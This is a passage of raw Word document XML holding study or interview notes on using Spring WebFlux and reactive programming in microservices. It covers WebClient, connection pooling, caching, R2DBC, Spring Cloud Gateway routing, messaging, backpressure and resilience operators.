    <w:p w14:paraId="73C301B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dundant operators (e.g., flatMap() inside loops).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B261BA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or subscribe() manually in service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFFC2D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Mono.defer() or Flux.defer() for deferred execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E27E89"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2FA3">
          <v:rect id="_x0000_i2370" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D0BB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nable Connection Pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A580D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WebClient, use Reactor Netty connection pooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08F30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ttpClient httpClient = HttpClient.create().compress(true).wiretap(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0560563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client = WebClient.builder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD873CA"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ientConnector(new ReactorClientHttpConnector(httpClient))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DEF73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uild();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF6D06"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FC4359">
          <v:rect id="_x0000_i2371" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC649C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Caching Where Possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A60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in-memory caches (Caffeine, Guava) or external (Redis) for frequent reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2E2B0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cache() on reactive chains where appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834478A"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0A3F2">
          <v:rect id="_x0000_i2372" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A936D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Monitoring &amp; Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAAFCA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Prometheus/Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA6A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metrics like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C2C64C"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 latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E2980"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 loop blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECAEFCF"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ignals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5ED002"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rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325EC7A7"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4313">
          <v:rect id="_x0000_i2373" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="791E0CD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Stress Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E040C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tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Artiller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Gatl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JMeter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to simulate high traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062282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CPU, memory, and GC behavior under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE6213"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FE04F">
          <v:rect id="_x0000_i2374" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0575CD"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Use Efficient Data Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12851FE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use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pagination with Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of returning huge lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1825A003"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N+1 queries; optimize with reactive joins or batch fetches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678445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3CF737">
          <v:rect id="_x0000_i2375" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE1BE39"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0. Resilience Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B990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tryWhen(), timeout(), circuitBreaker() (via Resilience4j/Reactor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30397E6D"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failing entire chains due to one upstream failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663897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376" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="242774E5" w14:textId="0C5204B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3" w:name="_Toc197867767"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you explain how you would use Spring WebFlux in a microservice architecture</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="553"/>
    </w:p>
    <w:p w14:paraId="6EC1BC04" w14:textId="31686EA9" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D708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Here's how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its into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservice architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956D95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99A9AF">
          <v:rect id="_x0000_i2377" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DDC4FD"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Reactive Microservice Design with WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDAEF9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microservices, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each service handles a specific business responsibility</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each service can be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3326008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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EEBC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3EC4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ghtweight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B1F3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rom controller to DB/API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF9D4F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F8F91">
          <v:rect id="_x0000_i2378" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B692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Reactive Communication Between Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE1F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one service to call another:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FCBC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5CD3D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5DC142EA" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A31028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String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253A774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4EFF3CF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30D24C2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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF98F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75CACD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695FEE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05167C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stTemplate – it's blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0640D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ervice Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Eureka/Consul) for dynamic routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F236E6"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38439">
          <v:rect id="_x0000_i2379" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730D16C"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Reactive Persistence Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DEFB18"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PostgreSQL, MySQL)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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4353AB60"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JDBC or Hibernate (they block threads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE24BA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337E28D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User&gt; findByAgeGreaterThan(int age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F125F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349F2C9"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42A50">
          <v:rect id="_x0000_i2380" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3C723"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API Gateway Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B537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which is based on WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D231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routing, rate limiting, authentication at edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA7172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pring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130BE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oud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE05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ateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D277CD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outes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEDFC2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d: user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF05F1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lb://USER-SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327C71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edicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1C647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ath=/users/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4819CE"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83454">
          <v:rect id="_x0000_i2381" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5812BA31"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vent-Driven Communication (Async)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617DD92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 xml:space="preserve"> for async events between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400372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tegrate with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor 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pring Cloud Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reactive support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074FF34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C4F42">
          <v:rect id="_x0000_i2382" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2134180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Chaining Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6689767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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chain service calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using reactive operators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429385F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3087CF9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Inventory(request.getItemId())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6533B2C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isAvailable -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5ECE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isAvailable) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F26783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aymentService.processPayment(request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DDFDD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0C60F01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Out of stock"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8406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FCA92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4F149D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AB1B7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98187">
          <v:rect id="_x0000_i2383" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A8ED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Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955737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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B750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for controller/integration testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A05240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for service layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243C0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or @MockBean for mocking dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E371D"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BAD6E9">
          <v:rect id="_x0000_i2384" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D52A3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Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1D2F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Prometheus/Grafana.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7ADD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ce with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sleuth + Zipki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OpenTelemetry</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64F5F5"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D36B55">
          <v:rect id="_x0000_i2385" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CA494"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p w14:paraId="6B827CE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elps microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FDD00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 high concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F21A87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y responsive under load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394942A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e with async systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F2E4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rove resource usage via event-loop model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D70E17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386" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E872CA3" w14:textId="34C7CC5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54" w:name="_Toc197867768"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you use reactive programming to integrate microservices</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="554"/>
    </w:p>
    <w:p w14:paraId="078D4E0E" w14:textId="2012D90E" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="0041385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integrate microservices using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to ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking, efficient, and scalable communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between services. Here’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how you can do it step-by-step</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F814ED"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B9F37">
          <v:rect id="_x0000_i2387" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247978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WebClient for Inter-Service Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CB7D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the reactive, non-blocking HTTP client in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34756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1677591B"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BA223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1632CC33" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D0834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ById(String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4981A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6DFFC05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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078330F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userId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB09C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FB36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707D4B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D3CCC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with load balancers (lb://) via Spring Cloud LoadBalancer or Eureka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0564AFD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n't block threads like RestTemplate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B98227"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7EFCD">
          <v:rect id="_x0000_i2388" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2BF80"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Chain Service Calls with Mono/Flux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739673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one microservice depends on responses from others, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chain calls reactively</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039B86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Order Service calling Inventory + Payment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163C77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2BE90D9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Stock(request.getProductId())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BAE9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ilter(Boolean::booleanValue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C062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witchIfEmpty(Mono.error(new RuntimeException("Out of Stock")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D492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available -&gt; paymentService.processPayment(request.getPaymentDetails()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706443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73157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thread blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A83D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upported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FB4C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leaner control flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16762310"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757D3">
          <v:rect id="_x0000_i2389" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2BD33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Use Messaging for Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25529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oose coupling and fire-and-forget patterns, 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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1DAB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pring Cloud Stream or Project Reactor-based libraries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386054F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eamListener("order-created")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7F09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handleOrderCreated(Order order) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC532B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actively process message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B382F6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57EC1A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E11703">
          <v:rect id="_x0000_i2390" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD90C7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Backpressure Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF624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downstream services are slow, you can apply backpressure using Flux operators like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2029469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Rate()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A859C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Buffer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CBAA1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Drop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A2C0B"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3CB45E">
          <v:rect id="_x0000_i2391" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A88987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Retry, Timeout, and Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354DA11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streams make it easy to add resilience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E29A7F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1F1EEE2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user/{id}", id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A231A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9574F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559667F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E846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imeout(Duration.ofSeconds(2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA6D4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new User())); // fallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF6BB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E051BD">
          <v:rect id="_x0000_i2392" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365839C"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API Gateway (Spring Cloud Gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876D00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s built on WebFlux, so it fits reactive systems perfectly. You can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0116E2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oute requests reactively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66097E1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filters (auth, logging, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15362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 WebSocket, SSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D1B83"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CA676">
          <v:rect id="_x0000_i2393" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9551C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Database Integration with R2DBC / Reactive MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6EE2F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 DB drivers to complete the end-to-end reactive chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F05BC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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E53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687AC6A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Flux&lt;User&gt; findByActive(boolean active);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492441A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EF83C21"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7ADECC">
          <v:rect id="_x0000_i2394" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64276CE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464"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="6B7D4E8E" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57895BC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ask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
